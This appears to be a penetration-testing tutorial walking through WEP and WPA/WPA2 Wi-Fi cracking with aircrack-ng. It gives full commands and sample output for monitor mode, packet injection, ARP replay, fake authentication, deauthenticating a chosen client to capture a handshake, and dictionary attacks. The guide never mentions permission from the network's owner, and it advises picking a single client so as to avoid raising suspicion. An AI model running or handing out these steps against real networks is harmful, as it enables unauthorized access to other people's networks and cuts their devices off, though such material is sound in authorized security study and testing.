Cyber Security Find, Exploit, Fix

A Penitration Tester's Guide

Wireless Cracking - WEP and WPA

Introduction

Wireless networks have always been considered more insecure than secured wireless networks. In 2004 Aircrack was first introduced as a wireless attacking tool. It now has the capability to do standard dictionary attacks against WPA/WPA2 and can crack WEP in only a few minutes. This guides goes over the basics of how to install aircrack-ng, setting up your wireless card, targeting a network and exploiting it.


Installation

Process Terminal Command
Dependencies sudo apt-get -y install build-essential libssl-dev iw
Download Archive wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
Extract Archive tar -zxvf aircrack-ng-1.1.tar.gz
Enter Directory cd aircrack-ng-1.1
Compile make
Install sudo make install
Update sudo airodump-ng-oui-update

Preparation

The first important thing to have open is a text file, it makes life much easier if you copy mac address into it instead of trying to retype them everytime.

Monitor Mode - WPA and WEP

For both WEP and WPA/WPA2 cracking your wireless device must be able to enter a monitoring mode. To do this, find your device's name run the command:

Command
iwconfig

It will look something like wlan0, wifi0, ath0, eth0, etc...

Note: if you have more than one device, the numbers will increment. Generally the on-board device will appear as the lower number.

To put the device in monitor mode, run:

Command
sudo airmon-ng start <device>
Example
sudo airmon-ng start wlan0

The program should show up with that device, with a message under it saying "monitor mode enabled on mon0".

Note: you can also specify what channel it should lock too by adding the channel number after the device. This could be benificial if you know what channel the target network is running on.

Finding the Target Router - WPA and WEP

The first step, which is finding your target network can be done with several tools from the native wireless client to Kismet. The advantage of using Airodump is that it will also view who else is connected to those networks. This is necessary if you are going to target someone already on the network or if your card is incapable of injecting packets.

To find all the networks within the range of the network, use the command :

Command
sudo airodump-ng <interface>
Example
sudo airodump-ng mon0

Pro-tip* In linux use the command Ctrl+C to stop the current process in the terminal, and Ctrl+Shift+C to copy anything from the terminal to the clipboard (Ctrl+Shift+V to paste.)

Packet Injection - WEP Only

The hardest part of a successful WEP attack can be customizing your wireless drivers to support packet injection.

We are going to test this before trying to crack into any WEP networks.

First, enable monitoring mode, then find the target network.

Command
sudo airmon-ng start <interface>
sudo airodump-ng <interface>  
 

Now we are going to run a test against the network to see if your card supports packet injection.

Command
sudo aireplay-ng -9 -e <"Essid of router"> -a <bssid of router> <interface>
Example
sudo aireplay-ng -9 -e "Rogue Network" -a 00:14:D1:C3:C9:88 mon0
 
Note: If you are getting the error “mon0 is on channel -1, but the AP uses channel 8 ” you need to stop monitor mode on the wireless card, and restart it only on the target's network.

Sudo airmon-ng stop mon0
sudo airmon-ng start <interface> <channel #>

Sudo airmon-ng stop mon0
sudo airmon-ng start wlan0 8

Working


If your card supports packet injection, the test should result in 100% or close to it.

21:14:38  Waiting for beacon frame (BSSID: 00:14:D1:C3:C9:88) on channel 8
21:14:38  Trying broadcast probe requests...
21:14:38  Injection is working!
21:14:40  Found 1 AP

21:14:40  Trying directed probe requests...
21:14:40  00:14:D1:C3:C9:88 - channel: 8 - 'Rogue Network'
21:14:42  Ping (min/avg/max): 4.046ms/66.339ms/111.944ms Power: -28.33
21:14:42  30/30: 100%

If you have gotten this test to work, congratulations! You can skip the rest of this section.

Not Working


If injection is not working, you will see something like this:

21:12:21  Waiting for beacon frame (BSSID: 00:14:D1:C3:C9:88) on channel 8
21:12:21  Trying broadcast probe requests...
21:12:22  No Answer...
21:12:35  Found 1 AP

21:12:35  Trying directed probe requests...
21:12:35  00:14:D1:C3:C9:88 - channel: 8 - 'Rogue Network'
21:12:43  0/30: 0%

From here you should check what device you are running, you can do this simply by starting or stopping airmon-ng on your wireless card. It has a very nice display of the interface, the chipset and the driver of your wireless card.

Interface       Chipset                  Driver

wlan0            Intel 4965/5xxx       iwlagn – [phy0]

You can compare this information to the list of cards and drivers on aircrack-ng's website. From here there are instructions and possible patches for different cards to allow them to be operational with packet injection.

Note: If you have tested packet injection on your card and it is not working, it is still possible to crack WEP keys. The point of injection is to speed up the process, however if there is a large amount of network traffic it would not be an issue to skip step three.

WEP Cracking

Wep cracking is based on the fact of statistical vulnerability with it's Initialization Vectors (IVs). To understand in more detail the threat, there are many articles online, and I would recommend this one from berkley.

There are four basic steps to cracking a WEP network:
  1. Find the network and anybody connected to it
  2. Start capturing network traffic on that channel
  3. Generate more network traffic to capture IVs faster
  4. Use aircrack to crack the WEP key

The last three steps are done concurrently.

Note: Make sure to have monitor mode running on the desired wireless device before continuing.

Capturing IVs

Running airodump-ng without any filters can result in a large list if there are a lot of networks around. To calm the waters, after you have found the network copy the bssid and the channel number to either a file or memory. Then we put it back into the command to only view this one network and start capturing the IVs (note, you don't have to set the channel as well, but it is pointless to have it channel hop if you are only viewing one network)

Command
sudo airodump-ng --bssid <bssid> --channel <#> -w <output file> --ivs <interface>
Example
sudo airodump-ng --bssid 00:14:D1:C3:C9:88 --channel 8 -w WEP --ivs mon0

While this is running there is a column that says '#data' which is the amount of current packets captured. This number needs to be larger than 10,000 to have a decent chance at cracking the network key.

Keep this window running throughout the additional steps, airodump is capturing all the needed packets to try and crack later.

Generate Traffic

It is possible to capture IVs and crack the key without packet inject, if you card is incapable of packet injection, wait for a lot of data packets in airodump, and skip to 'Cracking the Key.'

There are three ways to generate traffic:
  • Target a single device's ARP request packets to resend
  • Have fake authentication with the device then target your own connection
  • Replay all ARP packets from the router

Targeting a Device


The most efficient way to generate IVs is to target a device already on the network. This step will start reading the traffic between the device and the router, once a ARP request is found, the program will take the packet and keep 'replaying' it back to the router. This will make the router think the device is resending it, which results in more traffic with new IVs. 

Open a new terminal and type the command:

Command
sudo aireplay-ng -3 -b <router bssid> -h <device bssid> <interface>
Example
sudo aireplay-ng -3 -b 00:14:D1:C3:C9:88 -h 00:16:ea:72:58:ba mon0

Replay all ARP Packets


The easiest way to try and generate traffic is to not specify any target and try to replay all traffic from the router. This can be accomplished by running:

Command
sudo aireplay-ng -3 -b <router bssid> <interface>
Example
sudo aireplay-ng -3 -b 00:14:D1:C3:C9:88  mon0

Fake Authentication


By far the most fun way to hack the router is to create a fake connection to the router and attack that fake connection. It requires both the Essid and Bssid of the network, along with your devices mac address. To find the mac address use the command:

Command
ifconfig -a | grep HWaddr

The next step is to start the authentication attack:

Command
sudo aireplay-ng <# of reauths> -o 1 -q 10 -e <”Essid”> -a <router bssid> -h <your mac address> <interface>
Example
sudo aireplay-ng -1 6000 -o 1 -q 10 -e "Rogue Network" -a 00:14:D1:C3:C9:88 -h 00:16:ea:72:58:ba mon0

This command has the optional -o 1 and -q 10, they are not needed but can help keep the connection alive on most routers. The command -o 1 will only send a single set of packets at a time, and -q 10 will send keep alive packets every 10 seconds.

Now open a new window and use the Targeting a Device command:

Command
sudo aireplay-ng -3 -b <router bssid> -h <your mac address> <interface>
Example
sudo aireplay-ng -3 -b 00:14:D1:C3:C9:88 -h 00:16:ea:72:58:ba mon0

Cracking the Key

The simplest process is cracking, or more precisely, 'statistically deriving' the network key. This only requires the file that airodump-ng has been writing too. The capture file will be appended -01.ivs if it is the first file, and will increase in number if you use the same name. For example, we named the file WEP, which makes it WEP-01.ivs.

To start the process, we run:

Command
sudo aircrack-ng -a 1 <capture file>
Example
sudo aircrack-ng -a 1 WEP-01.ivs
Note: airodump-ng and aircrack-ng can run simultaneously. If at first there are not enough packets for aircrack-ng to find the key, as soon as the next level of packets is reached it will automatically retry.

WPA/WPA2 Cracking

Currently the best way to try and crack a WPA or WPA2 network with aircrack-ng is using dictionary based attacks.

A WPA attack is comprised of three steps:
  1. Finding the target network and a client of it
  2. Force the client to reconnect and capture the WPA handshake
  3. Dictionary attack the handshake to find the key

Deauthing

It is possible to passively wait for someone new to connect to the network and capture a handshake without deauthing anyone; but this is more fun.

This time when starting up airodump-ng, do not add the –ivs tag.
Also note this will create a .cap file instead of a .ivs file.

Command
sudo airodump-ng --bssid <router bssid> --channel <#> -w <outputfile> mon0
Example
sudo airodump-ng --bssid 00:14:D1:C3:C9:88 --channel 8 -w WPA mon0

Now if there are clients connected, select one you want to deauth so you only disturb one client instead of arising the suspicion of many. Open up a new terminal while airodump-ng is still running and type:

Command
sudo aireplay-ng --deauth <# of deauths to send> -a <router bssid> -c <client bssid> mon0
Example
sudo aireplay-ng --deauth 5 -a 00:14:D1:C3:C9:88 -c 00:16:EA:72:58:BA mon0
Note: if the -c (client) option is not enabled, the deauth will drop everyone on the network. There is NO advantage to having multiple WPA handshakes, aka target an attack if possible.

Dictionary Attack

In the airodump-ng terminal the upper right should say “WPA Handshake: <router bssid>”. You may have to give the client a minute to re-connect to the network, but most computer will automatically try to reconnect. If there is nothing in the upper right corner it still could have captured a handshake without updating the screen, at least try the capture file to see if there is one before deauthing more people. 

The last step is to take the captured handshake and run lists of popular words or known passwords against it. I have compiled Glist.txt which has both common and odd passwords, it is available for download here.

Command
sudo aircrack-ng -a 2 -w <dictionary file> <caps file>
Example
sudo aircrack-ng -a 2 -w Glist.txt WPA.cap

Pro-tip* many wordlists are available all over the internet, try finding ones that you like to use.

Note: Glist is a wordlist I have compiled for my use, it currently has over 4 million words and on my system takes just under 2 hours to run through the entire list. It is 49mbs, and only 11mbs compressed.